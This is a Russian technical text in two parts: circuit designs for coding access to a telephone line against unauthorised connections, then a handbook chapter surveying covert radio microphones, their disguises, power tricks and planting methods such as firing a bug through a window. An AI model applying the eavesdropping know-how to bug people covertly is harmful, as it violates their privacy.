Для ограничения доступа посторонних лиц к телефонному аппарату, а также для защиты радиотелефонов применяют устройства дополнительного кодирования. В простейшем случае набор кода производится вручную на диске (тастатуре) телефонного аппарата. На Рис. 25 приведена схема кодирования доступа к линии, где в качестве кода используется одна цифра. Несмотря на простоту, эффективность применения схемы может быть достаточно велика.
В состав схемы входят:
• датчик тока R1,VT1;
• узел подготовки счета - DD1.1, R3, С2, DD1.2;
• счетчик — DD2;
• узел включения запрета набора номера DD1.3.R5;
• ключ DA1;
• нагрузочное сопротивление — R4;
• узел отключения запрета — R7, R8, СЗ, DD1.4, DD3.1.VD2;
• цепь питания микросхем — VD 1, R9, С4, VD4.
Алгоритм работы схемы следующий.
После снятия трубки с аппарата (ТА) счетчик DD2 подготавливается к счету (через время ~ 1,5-2 с на выходе 4 DD1.2 появляется логический "ноль"). Одновременно, через элемент DD1.3 включается ключ DA1, тем самым шунтируя линию нагрузочным сопротивлением R4. Реальный набор номера невозможен. Но, благодаря наличию датчика тока Rl, VT1, возможен прием одной цифры кода. Цифра устанавливается переключателем SA1.
Импульсы кодовой цифры поступают с выхода 3 DD1.1 на счетный вход 14 DD2. Если код принят правильно, элемент DD1.4 переключается, закорачивая через диод VD2 управляющий вход DA1. Линия свободна для дальнейшего набора номера.
Элемент DD3.1 фиксирует состояние счетчика DD2 при правильном наборе кода. Если код принят неправильно, микросхема DD2 считает по кругу до тех пор, пока случайно не попадает на необходимый выход счетчика. Таким образом, при незнании кода невозможно набрать полный номер абонента.
Если модернизировать схему установив дополнительный диод VD4, подключив его к выходу 11 (9) DD2, а цифру кода ограничить от 1 до 8, набор номера
становится вообще невозможен, потому что, как только счет DD2 доходит до девятой позиции (выход 11), микросхема DD2 останавливает счет и ключ DA1 остается включенным в течение всего времени попытки набора номера.
Необходимо отметить, что импульсы набора кода никак не влияют на состояние АТС, ее аппаратура их не воспринимает, так как линия шунтируется R4. При приеме вызова с АТС цепочка R3, С2 не позволяет переключить элемент DD1.2 и включить шунтирование линии ( а также счет микросхемой DD2). Переход устройства в первоначальное состояние (режим охраны) происходит через 1,5-2 секунды после того, как трубка ТА была положена на аппарат.
Приведенное выше устройство легко встроить в телефонный аппарат или в стационарный блок радиотелефона.
4.9. Устройство кодирования линии импульсным двухзначным кодом
Если прием импульсного кода производится с помощью датчика тока, включенного последовательно с телефонным аппаратом, то такое устройство не позволяет осуществить защиту линии при параллельном подключении пиратского аппарата. В самом деле, когда трубка основного ТА положена на аппарат, импульсы набора номера не воспринимаются последовательным датчиком тока. Для устранения этого недостатка требуется введение в схему датчика напряжения линии.
На Рис. 26 приведена схема устройства кодирования линии импульсным двухзначным кодом, которая подключается параллельно защищаемому ТА.
Таблица 2. Список деталей схемы устройства кодированного доступа к линии импульсным двухзначным кодом.
Элемент схемы |
Номинал |
Элемент схемы |
Номинал |
DA1 |
1014КТ1А |
R9 |
1М |
DD1.DD2 |
К561ЛА7 |
R10 |
1,5М |
DD3 |
К561ИЕ8 |
R11 |
560К |
VD1-VD4.VD5-VD6 |
КД102А |
R12 |
390К |
VD7.VD10 |
Д814А1 |
R13 |
10М |
VD8,VD9,VD11-VD17 |
КД522Б |
R14 |
390К |
R1 |
2К |
С1 |
1,ОмКф |
R2 |
4.7М |
С2 |
1000пФ |
R3 |
1,5М |
СЗ |
220,0 мкФ |
R4 |
ЮМ |
С4 |
1,0 мкФ |
R5 |
1М |
С5 |
10,0 мкФ |
R6 |
ЮМ |
С6 |
1,0 мкФ |
R7 |
390К |
С7 |
1,0 мкФ |
R8 |
5,6М |
VT1 |
КТ315Г |
В данной схеме вводится дополнительный элемент кодирования — алгоритм набора кода. Устройство реализует следующий алгоритм набора кода:
• снятие трубки ТА (слышен ответ станции 425 Гц);
• пауза 2-3 секунды (подготовка узла приема кода);
• набор двухзначного кода на диске (тастатуре) телефона без пауз между цифрами кода;
• кратковременный сброс линии
(кратковременно нажать на рычажный переключатель ТА, дождаться появления вновь сигнала ответа станции 425 Гц);
• набор номера абонента и установление связи.
Как видно из алгоритма, импульсы кода формируются непосредственно на линейных проводах линии, то есть они воспринимаются аппаратурой АТС как
набор первых двух цифр обычного номера. Таким образом, при неправильном наборе кода либо невыполнении алгоритма набора устройство осуществляет запрет дальнейшего набора номера (начиная с 3-4 цифры).
Следует отметить, что встречаются АТС, для которых набор конкретной цифры (например, "5") немедленно вызывает отбой линии, но это не мешает формированию и приему импульсов кода (их амплитуда по-прежнему составляет 60 В).
В состав схемы импульсного кодирования входят:
• диодный мост униполярного включения — VD1-VD4;
• датчик напряжения — VD5, R6, VD7, R5, С2, DD1.1;
• узел подготовки счета — VD9, R8, R9, С4, DD1.2;
• счетчик—DD3;
• узел приема первой цифры кода — SA2, VD 13, R13, R14, С7, DD2.3, DD2.4, VD15;
• узел приема второй цифры кода — SA2, R12, C6,DD2.1,DD2.2,VD14;
• схема временного включения запрета — R2, C1,DD1.3,R3;
• схема включения запрета по сумме цифр номера—R11,VT1,VD12, VD17;
• ключ запрета — DA 1;
• нагрузочное сопротивление — R1;
• схема принудительного отключения запрета — VD8,R4,C5,DD1.4,VD11;
• цепь питания микросхем — VD6, R7, СЗ. VD 10.
Принцип действия схемы заключается в следующем.
Подготовка к приему кода и временное включение запрета набора номера
В соответствии с алгоритмом, после снятия трубки на телефонном аппарате происходит подготовка к запуску счетчика DD3 (заряд С4 через VD9, R9, R8). Через 2-3 секунды (пауза по алгоритму) на входе 15 DD3 появляется логический "ноль", и микросхема DD3 готова к приему импульсов кода. До начала счета высокий уровень с выходя 3 DD3 поддерживает емкость С1 в заряженном состоянии через R2, соответственно, ключ DA1 разомкнут (запрет выключен).
После того как набрана первая цифра кода (или обычного номера), на выходе 3 DD3 появляется "ноль" и емкость С1 начинает разряжаться через R2. Время разряда, а значит и переключения элемента DD1.3 составляет около 5 секунд, поэтому обе цифры кода должны быть набраны быстро, без пауз между цифрами. Если код набран неверно или набирался обычный телефонный номер, то через 5 секунд после начала набора первой цифры сработает ключ DA1, зашунтировав линию нагрузочным сопротивлением R1 (включается запрет дальнейшего набора номера).
Прием кода
Прием первой цифры кода осуществляется через переключатель SA2, а второй — через SA1. Схема подключения выводов приведена в таблице 3. Заметим, что вторая цифра отсчитывается от первой по кольцу счетчика DD3. В исходном состоянии диод VD15 закорачивает емкость С6 на "ноль" на выходе 3 DD2.4, поэтому узел приема второй цифры не может сработать раньше первого. При правильном приеме первой цифры на выходе 3 DD2.4 появляется "единица", а значит, цепь R12, С6 готова к приему второй цифры. Одновременно, через диод VD17 запирается база транзистора VT1, который используется в цепи включения запрета по сумме цифр номера. Если
вторая цифра также набрана верно, то на выходе 4 DD2.2 появляется "единица", которая:
• через VD 16 останавливает счет DD3;
• через VD 14 фиксирует состояние узла приема первой цифры (емкость С7);
• через диод VD12 отключает ключ запрета DA1. Таким образом, после правильного выполнения алгоритма включения, а также набора двух цифр кода. ключ запрета DA1 принудительно блокируется. Линия свободна и, если выполнить кратковременный сброс линии. можно набирать любой номер для установления связи.
Таблица 3. Зависимость кода от схемы подключения выводов.
Вывод микросхемы DD3 |
Код |
|
Переключатель SA2 |
Переключатель SA1 |
|
Первая цифра кода |
Вторая цифра кода |
|
1 |
2 |
56 |
1 |
4 |
57 |
1 |
7 |
58 |
1 |
10 |
59 |
5 |
2 |
65 |
5 |
4 |
66 |
5 |
7 |
67 |
5 |
10 |
68 |
6 |
2 |
74 |
6 |
4 |
75 |
6 |
7 |
76 |
6 |
10 |
77 |
9 |
2 |
83 |
9 |
4 |
84 |
9 |
7 |
85 |
9 |
10 |
86 |
Включение запрета по сумме цифр номера
Время включения запрета в 5 секунд выбрано из практических соображений для устойчивого приема кода. Но существующие кнопочные телефонные аппараты позволяют достаточно быстро набрать номер (быстрее 5-7 секунд), поэтому для повышения эффективности применения устройства кодирования в схему встроена цепочка R11, VT1, которая включает запрет набора номера, когда сумма цифр превышает 9 (девять). В этом случае открывается транзистор VT1 (через R11 с выхода 11 DD3) и принудительно переключает элемент DD1.3, включая, тем самым, ключ запрета DA1. Естественно, что цепь R] 1, VT1 не действует, когда правильно набрана первая цифра кода, так как база VT1 закорочена диодом VD17 на выход DD2.3.
Отключение запрета набора номера
После появления высокого уровня на выходе DD1.3 начинается заряд емкости С5 через R4. Время заряда выбрано достаточно большим (около 2-х минут), после его окончания происходит быстрое обнуление счетчика DD3 и вся схема приходит в исходное состояние готовности к приему кода.
В случае, когда код был принят верно, схема приходит в исходное состояние после того, как трубка телефонного аппарата была положена на время более 3-4 секунд (определяется временем разряда С4 через R8).
Если включить параллельно шунтирующему сопротивлению светодиод, то полученная светодиодная индикация состояния ключа запрета DA1 поможет освоить алгоритм набора кода.
В этом случае порядок проверки работоспособности устройства будет следующим:
• подключить устройство к линии двумя проводами без учета полярности, разводку производить непосредственно в телефонной розетке;
• при первом включении прибора возможно кратковременное (на 6-10 секунд) срабатывание системы запрета (светодиод горит);
• после снятия трубки и паузы до 3-х секунд набирается двухзначныи код (светодиод в этом режиме не горит);
• производится кратковременный сброс линии и ожидание сигнала ответа станции 425 Гц;
• если светодиод не загорается, значит код принят верно и можно набирать необходимый номер для установления связи;
• для проверки работоспособности системы запрета набора номера необходимо набрать любой номер без предварительного набора кода; запрет набора номера происходит одновременно с зажиганием светодиода (либо через 5 секунд после начала набора, либо после 2-х - 4-х цифр номера, что однозначно не позволяет набрать полный номер и установить связь).
Устройство защиты линии, работающее по описанному выше алгоритму, рекомендуется для применения совместно с радиотелефоном или обычным аппаратом, когда необходима простая кодовая защита от всех видов подключений. Данное устройство может быть установлено и на выходных клеммах АТС, тогда оно
препятствует нелегальному использованию линии даже при разрыве шлейфа АТС-абонент.
Общие рекомендации по применению технических средств защиты.
Решение об использовании различных технических устройств для защиты от самовольного коммерческого использования телефонной линии обычно принимается после того, как все остальные меры защиты (в основном организационного плана) оказались безрезультатными. В частности, проверка и контроль линии не выявили мест подключения, а руководство узлов связи не провело эффективной работы по предупреждению случаев пиратства. В то же время, счета на оплату поступают по-прежнему завышенные и на их списание надежд нет. В этом случае абоненты АТС обращают внимание на индивидуальные средства контроля и защиты линии. Но прежде чем установить их на своей линии необходимо еще раз попытаться использовать все технические возможности официальных служб узлов связи. В частности, электронные АТС последних моделей допускают кодирование исходящей связи 2-х - 4-х значным кодом. После снятия трубки на аппарате абонент вручную набирает код на диске (тастатуре) ТА, после чего связь происходит обычным образом. Код устанавливается по письменной заявке абонента. К сожалению, невозможность достаточно оперативного изменения кода снижает эффективность
подобной услуги. Индивидуальный код может быть считан при помощи простейших электронных устройств.
С учетом вероятностного характера пиратских подключений (глава 1) в качестве простейшей технической защиты телефона могут быть рекомендованы следующие решения.
Для домашнего ТА
Установка двух блоков защиты:
• от параллельного подключения (последовательное включение с ТА)
• блокиратор межгорода по любому принципу
действия ("8", "07", ограничение цифр). Схема включения приведена на Рис. 32. Следует отметить, что почти для всех описанных выше схем защиты допускается их комплексное последовательно-параллельное включение. Необходимо лишь контролировать суммарное сопротивление нагрузки на линию по цепям питания приборов, которое не должно быть менее 300 кОм.
Для телефонов на предприятиях
Учитывая, что главной проблемой для внутренних линий является проведение междугородных переговоров за
счет предприятия, фирмы, можно рекомендовать установку блокираторов межгорода на все линии, которые необходимо отключить от АМТС (выхода на межгород через цифру "8" или по заказу "07"). Естественно, что эту проблему решают и службы АТС, но процедура занимает много времени, а в случае индивидуальных блоков защиты появляется возможность оперативной перепланировки кросса силами предприятия. Схема установки приведена на Рис. 33.
Для радиотелефонов
Кроме всех видов пиратских подключений на участке проводной связи, для радиотелефонов характерно подключение в зоне радиоканала. Проблема обострилась в последнее время, когда в продаже появились дешевые сканеры, позволяющие имитировать любой переносной блок. Количество жалоб постоянно возрастает. Службы АТС практически не готовы решать проблему противодействия пиратству на радиочастоте. Единственным, на сегодняшний день, реальным способом борьбы (без изменения принципиальной схемы радиотелефона) является установка блокиратора межгорода и блока дополнительного кодирования линии. При достаточно частой смене кода вероятность того, что пираты будут анализировать дополнительный код, набираемый вручную, мала. Очевидно, что им легче перестроиться на незащищенную линию. На Рис. 34 приведена схема защиты радиотелефона. Кстати, установка абсолютного блокиратора межгорода (т.е. блокиратора, который можно отключить лишь находясь в помещении, где он установлен) позволяет на 100% гарантировать отсутствие дорогостоящих междугородных разговоров по радиочастоте радиотелефона.
ЛИТЕРАТУРА
1. И.Н.Бронштейн, К.А.Семендяев. Справочник по математике. Издание 13-е исправленное. — М.; Наука, 1998г.—544с.
2. И.Н.Балахничев, А.В.Дрик. Практическая телефония. — Мн.: Наш город, 1998г. — 128с.
3. К.Мовсун-Заде. "Сторож" вашего телефона. — М.:
"РАДИО" №11 1998г., с.53.
4. Б.З.Берлик, А.С.Брискер и др. Справочник. Городская телефонная связь. — М.: Радио и связь, 1987г. — 280с.
5. Каталог-справочник. Оружие шпионажа. — М.:
Империал, 1994г. — 240с.
Раздел 4.
Андpианов В.И. Боpодин В.А. Соколов А.В.Спpавочное пособие.-Лань,СПБ.,1996
Рецензия
До недавнего времени область техники, которой посвящена эта книга, была под строгим государственным контролем, и информация о достижениях науки в этой области была доступна только узкому кругу специалистов. Вместе с развитием рыночных отношений и снятием "железного занавеса" возникла возможность вынесения темы "секретных" устройств и технологий на широкое обсуждение. Условия успешного развития бизнеса сегодня неразрывно связаны с использованием информационных ресурсов, поэтому и круг читателей, интересующихся этой темой, постоянно растет. Среди книг, опубликованных на настоящий момент в России и странах Содружества, данная книга выделяется доступностью изложения материала без ущерба для его качества, широтой охвата темы, хорошим стилем изложения, достаточным количеством иллюстративного материала. На наш взгляд, эта книга будет очень полезна прежде всего сотрудникам служб безопасности государственных и частных предприятий, уделяющих большое значение вопросу защиты коммерческой информации, а также подготовленным радиолюбителям, желающим применить свои знания в этой области.
Генеральный директор Ассоциации Защиты Информации "Конфидент" Кузнецов П.А.
Глава 1. Устройства и системы технической разведки
1.1. Общие сведения
Бурное развитие техники, технологии, информатики в последние десятилетия вызвало еще более бурное развитие технических устройств и систем разведки. В самом деле, слишком часто оказывалось выгоднее потратить N-ю сумму на добывание, например, существующей уже технологии, чем в несколько раз большую на создание собственной. А в политике или в военном деле выигрыш иногда оказывается просто бесценным.
В создание устройств и систем ведения разведки вкладывались и вкладываются огромные средства во всех развитых странах. Сотни фирм многих стран активно работают в этой области. Серийно производятся десятки тысяч моделей "шпионской" техники. Эта отрасль бизнеса давно и устойчиво заняла свое место в общей системе экономики Запада и имеет прочную законодательную базу.
В западной печати можно найти весьма захватывающие документы о существовании и работе международной организации промышленного шпионажа "Спейс Инкорпорейтед" а заодно и познакомиться со спектром услуг, предлагаемых этой компанией. Так, английская газета "Пипл" сообщает, что среди клиентов компании есть не только промышленники, но и организованные преступные группировки. Как и любой бизнес, когда он выгоден, торговля секретами расширяет область деятельности, находя для своего процветания выгодную почву. Так, в Израиле, по примеру США, начинают относится к ведению разведки в экономической области как к выгодному бизнесу.
В качестве подтверждения можно привести факт создания бывшим пресс-секретарем израильской армии Эфраимом Лапидом специализированной фирмы "Ифат" по сбору и анализу сведений,которые могли бы заинтересовать различных заказчиков (не исключая и министерство обороны). По мнению Э. Лапида, Израиль, отличающийся большим спектром международных связей, выбором иностранной печати и удачным геополитическим положением, является "удобным" государством для организации и ведения "бизнес-разведки".
Французский журнал деловых кругов "Антреприз" так характеризует национальные черты промышленного шпионажа: "... наиболее агрессивными являются японцы. Шпионаж на Востоке носит систематический и централизованный характер. Что касается американцев, то они уделяют значительную часть своего времени взаимному шпионажу...''
Тематики разработок на рынке промышленного шпионажа охватывают практически все стороны жизни общества, безусловно ориентируясь на наиболее финансово выгодные.
В России после 1917 года ведение коммерческой разведки находилось под строгим контролем государства. В Советском Союзе в этой области были сосредоточены великолепные, если не сказать лучшие, специалисты. Выдающимся достижением было и останется на многие годы чудо технической разведки - здание посольства США в Москве, превращенное в огромное "ухо", в котором каждый вздох, каждый шорох был доступен для записи и анализа. Датчики находили даже в сварных стальных конструкциях здания, причем по плотности материала они соответствовали окружающему металлу и были недоступны для рентгеновского анализа. Эти системы были способны функционировать автономно десятки лет. Американцы вынуждены были отказаться от использования этого здания, даже несмотря на то что бывший глава КГБ Вадим Бакатин передал им схему построения этой системы.
Крушение СССР и развитие свободной рыночной экономики возродило спрос на технику подобного рода. Сказавшиеся без работы специалисты военно-промышленного комплекса не замедлили предложить своп услуги и в этой области. Спектр услуг широк: от примитивных радиопередатчиков до современных аппаратно-программных комплексов ведения разведки. Конечно, у нас нет еще крупных фирм, производящих технику подобного рода, нет и такого обилия моделей, как на Западе, но техника наших производителей вполне сопоставима по своим данным с аналогичной западной, а иногда лучше и дешевле. Разумеется, речь идет о сравнении техники, которая имеется в открытой продаже.
Естественно, аппаратура, используемая спецслужбами (ее лучшие образцы) намного превосходит по своим возможностям технику, используемую коммерческими организациями. В качестве примера можно привести самый маленький и самый дорогой в мире радиомикрофон, габариты которого не превышают четверти карандашной стерательной резинки. Этот миниатюрный передатчик питается от изотопного элемента и способен в течение года воспринимать и передавать на приемное устройство, расположенное в полутора километрах, разговор, который ведется в помещении шепотом. Кроме того, уже сейчас производятся "клопы", которые могут записывать перехваченную информацию, хранить ее в течение суток или недели, передать в режиме быстродействия за миллисекунду, стереть запись и начать процесс снова.
В уже упоминавшемся новом здании американского посольства элементы радиозакладок были рассредоточены по бетонным блокам, представляя собой кремниевые вкрапления. Арматура использовалась в качестве проводников, а пустоты - в качестве резонаторов и антенн. Анализируя опыт развития подобной техники, можно сделать вывод, что возможность ее использования коммерческими организациями является только делом времени. Выделим основные группы технических средств ведения разведки.
В этой главе мы коснемся только тех технических средств ведения разведки, которые представлены в настоящее время на рынке России.
1.2. Радиомикрофоны
Радиомикрофон, как следует из названия, это микрофон, объединенный с радио, т.е. с радиоканалом передачи звуковой информации. В настоящий момент нет устоявшегося названия этих устройств. Их называют радиозакладками, радиобагами, радиокапсулами, иногда - "жуками", но все-таки самым точным названием следует признать название, вынесенное в заголовок данного раздела. Мы будем придерживаться в дальнейшем этого названия, хотя оно и не самое "сочное" из перечисленных.
В общем виде структурная схема радиомикрофона приведена на рис. 1.1. Радиомикрофоны являются самыми распространенными техническими средствами ведения коммерческой разведки. Их популярность объясняется прежде всего удобством их оперативного использования, простотой применения (не требуется длительного обучения персонала), дешевизной, очень небольшими размерами. В самом простом случае радиомикрофон состоит из собственно микрофона, т.е. устройства для преобразования звуковых колебаний в электрические, а также радиопередатчика - устройства, излучающего в пространство электромагнитные колебания радиодиапазона (несущую частоту), промодулированные электрическими сигналами с микрофона. Микрофон определяет зону акустической чувствительности (обычно она колеблется от нескольких до 20 - 30 метров), радиопередатчик - дальность действия радиолинии. Определяющими параметрами с точки зрения дальности действия для передатчика являются мощность, стабильность несущей частоты, диапазон частот, вид модуляции.
Существенное влияние на длину радиоканала оказывает, конечно, и тип радиоприемного устройства. На приемных устройствах мы остановимся, хотя и коротко, позже.
Устройство управления не является обязательным элементом радиомикрофона. Оно предназначено для расширения его возможностей: дистанционного включения-выключения передатчика, микрофона, записывающего устройства, переключения режимов. Могут быть предусмотрены режимы: включения по голосу, режим записи в реальном времени, режим ускоренного воспроизведения и т.д.
Устройство записи, как следует из сказанного выше, также не является обязательным элементом.
Разработаны и выпускаются серийно сотни моделей радиомикрофонов, в том числе не менее ста типов - в России и СНГ (в основном на Украине и в Белоруссии).
Технические данные радномнкрофонов находятся в следующих пределах:
вес ........................................... от 5 до 350 г
габариты..................................от 1 см^3 до 8 дм^3
частотный диапазон ...................... от 27 до 900 МГц
мощность ..................................... от 0,2 до 500 мВт
дальность без ретранслятора ......... от 10 до 1500 м
время непрерывной работы ........... от нескольких часов до нескольких лет.
Более подробные данные по конкретным моделям приведены в табл. 1.1. Как видно из данной таблицы, дальность действия, габариты и время непрерывной работы находятся в очень тесной зависимости друг от друга. В самом деле, для увеличения дальности необходимо прежде всего поднять мощность, одновременно возрастает ток, потребляемый от источника питмия, который быстрее расходует свой ресурс, а значит, сокращается время непрерывной работы. Чтобы увеличить это время, увеличивают емкость батарей питания, но это увеличивает габариты радиомикрофона. Можно увеличить длительность работы передатчика введением в его состав устройства дистанционного управления (включение-выключение), однако это также увеличивает габариты. Кроме того, нужно иметь в виду, что увеличение мощности передатчика облегчает возможность его обнаружения.
Наличие такого большого количества моделей радиомикрофонов объясняется тем, что в различных ситуациях требуется определенная модель.
Очень часто подобные изделия предлагаются комплектами. На рис. 1.2 приведен один из таких комплектов - АО-17.
Это профессиональный комплект различных радиомикрофонов с автоматическим приемником и индикатором излучений. Диапазон частот 350450 МГц. Комплект размещается в портфеле.
Таблица 1.1. Технические данные радиомикрофонов промышленного изготовления
Модель |
Габариты |
Тип и напряжения питания |
Вес |
Тип корпуса |
Дальность действия |
Каналы |
Вpемя непрерывн pаботы |
Дополнительные данные |
СAL-201 |
128x70x18 |
Щелочн.бат. АМ-З бат. (1,5В)х2 |
100г |
Закамуфлирован под калькулятор |
100-200 |
3(А,В,С) |
150 |
Встроенный высокочувствительный микрофон. Можно одновременно пользоваться калькулятором |
DХ-400 |
84х56х22 |
Литие.бат. 2СВ-5 (6В)х1 бат. |
130г |
Пластмасовый прямоугольный корпус |
1000-1500 3(А,В,С) |
3(А,В,С) |
15 |
Микрофон в виде булавки для галстука передает звук и прерывистый тональный сигнал |
ТК-400 |
166х27х14 |
Литие.бат. СВ-12600SЕ бат. |
52г |
Пластмасовый прямоугольный |
1500-1000 |
3(А,В,С) |
130 |
Обеспечивают высокое качество звука |
СAL-205 |
180x135х40 |
Сеть 220В и аккуму. бат. |
350г |
Настольный калькулятор |
100-200 |
3(А,В,С) |
не ограничен |
12-pазрядный калькулятор и микрофон могут работать одновременно |
ТК-400М |
аналогично ТК-400 |
аналогично ТК-400 |
анал. ТК-400 |
анал.ТК-400 |
500-1000 |
3(А,В,С) |
130 |
Микрофон в виде булавки для галстука, внешний микроскопи ческий микрофон, микрофон в виде иглы |
N-110N-2 |
62x18x9 |
сеть 110B сеть 220В |
20г |
Пластмассовый |
100-200 |
3(А,В,С) |
не огран. |
Тайный секpетаpь. Скpытый передатчик с питанием от сети переменного тока. Наиболее удобно поместить в совмещенную настенную pозетку. |
РК-3ОО |
Длина 130 мм |
батареи SR-48W бат. (1.5В)х2 |
120г |
Авторучка |
100-200 |
3(А,В,С) |
15 часов |
Одна из наиболее интересных моделей. Ручкой можно пользоваться не вызывая подозрений. |
СD-500S |
86х545х4.5 |
Лити.бат. CR-2430(3В) бат. |
20г |
Кредитная карточка |
200-300 |
3(А,В,С) |
30 часов |
Плоский, как кредитная карта, передатчик. Легко использовать при любых обстоятельствах. |
AZ-110A |
70х35х20 |
От сети 110 или 220 В |
45г |
Тройник-перен. для быт.аппар. |
100-200 |
3(А,В,С) |
Не ограничен |
Не работает от сети переменного тока и ограничен одновременно используется как тройник для бытовой аппаратуры. |
Состав комплекта:
Комплект дополняется антеннами "волновой канал" или "бабочка". Из рисунка видно, что в состав входят несколько видов радиомикрофанов. Они отличаются мощностью передатчика: радиомикрофон Р2 имеет мощность излучения 15 мВт и дальность действия до 300 м, габариты - 58х51х15 мм, а РЗ, например, - мощность 3 мВт, дальность действия до 150 м и, соответственно, меньшие габариты - ЗЗх27х7 мм.
На рис. 1 .3 изображен радиомикрофон РЗ. Это радиомикрофон со встроенным микрофоном и проводниками для подключения внешнего электропитания 1.5В. Включение радиопередатчика производится в момент подсоединения внешнего электропитания. Корпус пластиковый, антенна гибкая. Несущая частота в диапазоне 350 - 450 МГц.
Мощность излучения 3 мВт. Дальность действия до 150 м. Габариты - ЗЗх27х7 мм.
Распространенным явлением является маскировка радиомикрофонов под какие-то устройства двойного назначения: зажигалки, калькуляторы, часы и т.д. В качестве примера на рис. 1.4 изображен радиомикрофон в виде авторучки.
Красивая шариковая авторучка может работать как радиомикрофон с дальностью до 200 м (рис. 1.4). Встроенный микрофон обеспечивает высококачественный акустический контроль. Электропитание от часовых батареек, непрерывно до 15 ч. Частоты фиксированные (канал А или В) в диапазоне 350-450 МГц. Габариты - длина 130 мм, диаметр 14 мм, вес- 20 г.
Интересными являются изделия САL-201 и САL-205, замаскированные под калькуляторы, с питанием от сети. Это позволяет заодно решить и проблему питания, т.к. встроенные аккумуляторы имеют возможность зарядки от сети. Существуют модели, выполненные в виде заколки или зажима для галстука, наручных часов и др., подключаемые к передатчику или магнитофону, в зависимости от цели операции. На рис. 1.5 приведены примеры таких моделей.
Высокочувствительные миниатюрные микрофоны в авторучке, наручных часах, в значке и др. позволяют записать важную беседу в шумном месте. Электропитание от часовой батарейки обеспечивает непрерывную работу встроенного усилителя в течении нескольких месяцев. С помощью миниатюрного микрофона с усилителем удобно контролировать помещения, например, через имеющиеся вентиляционные отверстия. К проводу, выходящему от такого микрофона в соседнее помещение, подключается либо радиопередатчик, либо магнитофон.
Для записи разработаны и широко представлены в продаже специальные магнитофоны. На рис. 1 .6 изображена одна из моделей - профессиональный микрокассетный магнитофон с автореверсом и системой VОХ (системой включения по голосу). Кроме того, эта модель оборудована встроенным микрофоном н счетчиком ленты и имеет две скорости записи. В полный комплект входит пульт дистанционного управления (ДУ), адаптер для электропитания от сети, наушники, микрокассета МС-60, чехол. Габариты - 73х52х20 мм, вес - 90 г.
Одна из возможных схем применения скрытого радиомикрофона и магнитофона изображена на рис. 1.7. Подобный "джентльменский набор" включает в себя микрофон с булавкой, телефон с ушным креплением, кнопку включения передатчика, а также разъемы для подключения к различным радиостанциям и магнитофонам. Вес - 55 г.
Такая схема позволяет агенту записать на магнитофон и передать на приемное устройство нужную информацию. Еще более интересной является схема оперативного применения радиомикрофона, реализованная в изделии SIPE-PS. Это комплект, состоящий из бесшумного пистолета с прицельным расстоянием 25 м и радиомикрофона-стрелы. Он предназначен для установки радиомикрофона в местах, физический доступ к которым невозможен.
Радиомикрофон в виде наконечника стрелы в ударопрочном исполнении надежно прикрепляется к поверхностям из любого материала - металла, дерева, бетона, пластмассы и т.д. Тактика применения его следующая: стрела отстреливается через, например, открытую форточку и прикрепляется к стене. В реальных условиях города дальность действия радиомикрофона не превышает 50 м, и это обстоятельство снижает оперативную ценность системы.
Аналогичный комплект фирмы CCS включает арбалет и несколько стрел-дротиков. Это модель STG 4301. Микрофон обеспечивает контроль разговора в радиусе до 10 м, а передатчик передает сигнал на приемник, находящийся на расстоянии до 100 м.
Как уже говорилось, ограничивающим фактором является питание. Для увеличения времени функционирования стараются увеличить емкость батарей, но этот путь имеет свои пределы. В качестве примера оригинального решения этой проблемы можно привести факт обнаружения сотрудниками одной из организаций, занимающейся защитой коммерческой информации, при проверке в одном из офисов радиомикрофона, установленного в макете парусного корабля. Сам макет был заполнен элементами питания на полтора года непрерывной работы. В качестве антенны использовался такелаж модели.
Широко практикуется применение радиомикрофонов с питанием от внешних источников, в том числе от телефонной и радиосети. Уже упоминались изделия CAL-201 и CAL-205. Можно сказать об отечественном приборе ЛСТ-4, устанавливаемом в розетках электропитания, и ЛСТ-51, устанавливаемом в телефонной розетке.
Оригинальной является модель HR560 LICHT WUD. Это радиомикрофон, встроенный в цоколь обыкновенной лампочки накаливания, с дальностью действия до 250 м.
Еще одна модель радиомикрофона, предназначенного для контроля помещений и устанавливаемого в телефонной розетке, показана на рис. 1.8. Это ЧМ радиомикрофон AD-45-3. Электропитание осуществляется от телефонной линии. Дальность - до 150 м. Габариты - 22х16х12 мм, вес - 210 г.
Нельзя не сказать о радиомикрофоне SIPE MT. Этот радиомикрофон с ЧМ передатчиком и с питанием от солнечной батареи выполнен в виде стакана для виски. Элементы солнечной батареи замаскированы орнаментом на дне стакана. Для повышения скрытности радиомикрофон имеет два режима: включен, если стакан стоит на столе, и отключен, если его поднять или изменить положение в пространстве.
Дальность действия передатчика в диапазоне 130-150 МГц составляет 100 м. Аналогичный прибоp фирмы CCS модели STG 4104 выполнен в виде керамической пепельницы, что следует признать наиболее удачным примером маскировки, хотя применение батарей, скрытых в покрытом войлоком дне пепельницы, и ограничивает время его непрерывной работы. Встроенный ртутный выключатель отключает передатчик, если пепельницу перевернуть. Применение батарей, а также более солидный вес пепельницы позволили увеличить радиус действия прибора до 600 м. Передатчик работает на частоте 130-150 МГц.
Одним из перспективных направлений увеличения скрытности и времени эффективного использования является применение дистанционного включения. Примерами являются изделия ТRМ-1530 и ТRМ-1532. Это радиомикрофоны с питанием от батарей, габаритами 87х54х70 мм, весом около 100 г, с ЧМ передатчиком диапазона 380-400 МГц или 100-150 МГц и дальностью до 300 м. Дистанционное включение-выключение позволяет довести время эффективной работы изделия до 1 года при времени непрерывной работы 280-300 часов.
Подобная аппаратура, но несколько больших габаритов, начинает поступать в продажу и от отечественных производителей. Очень перспективным является применение радиомикрофонов с активацией отзвука - музыки, речи и т.д. Такова модель STG-4001. Включение устройства происходит от звука, выключение - автоматически через 5 секунд после исчезновения звука. Применение функции включения по голосу позволило довести время эффективной работы до 300 часов. Прибор имеет очень приемлемые размеры - 20х38х12 мм, вес с батареями - 18 г, обеспечивает дальность до 500 м, частоты - 130-150 МГц. Следует подчеркнуть, что такого рода радиомикрофоны довольно трудно обнаружить.
В сложных случаях возможно построение системы передатчиков. Например, при движении объекта по пути следования заранее размещаются радиомикрофоны, работающие на разных частотах.
Наблюдение ведется при помощи многоканального приемника. Возможно построение схемы с использованием передатчика-ретранслятора. Мощность радиомикрофона делается очень небольшой (для увеличения времени работы и повышения скрытности), а на небольшом расстоянии, например, в соседнем помещении, устанавливается передатчик-ретранслятор, габариты и мощность которого подвергаются гораздо меньшим ограничениям.
